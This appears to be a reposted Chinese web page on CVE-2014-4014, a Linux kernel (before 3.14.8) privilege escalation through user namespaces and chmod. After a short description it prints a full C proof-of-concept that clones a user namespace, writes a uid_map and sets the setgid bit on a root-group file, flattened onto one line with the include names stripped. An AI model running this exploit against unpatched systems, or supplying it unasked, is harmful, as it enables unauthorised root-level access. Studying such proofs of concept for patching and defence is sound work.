# CVE-2014-4014 Linux kernel before 3.14.8 權限提升漏洞
==INFO==
The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.
==cve-2014-4014.c==
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * vnik5287@gmail.com */ #define _GNU_SOURCE #include#include #include #include #include #include #include #include #include #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; struct args { int pipe_fd[2]; char *file_path; }; static int child(void *arg) { struct args *f_args = (struct args *)arg; char c; // close stdout close(f_args->pipe_fd[1]); assert(read(f_args->pipe_fd[0], &c, 1) == 0); // set the setgid bit chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); return 0; } int main(int argc, char *argv[]) { int fd; pid_t pid; char mapping[1024]; char map_file[PATH_MAX]; struct args f_args; assert(argc == 2); f_args.file_path = argv[1]; // create a pipe for synching the child and parent assert(pipe(f_args.pipe_fd) != -1); pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); assert(pid != -1); // get the current uid outside the namespace snprintf(mapping, 1024, "0 %d 1\n", getuid()); // update uid and gid maps in the child snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); fd = open(map_file, O_RDWR); assert(fd != -1); assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); close(f_args.pipe_fd[1]); assert (waitpid(pid, NULL, 0) != -1); }
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容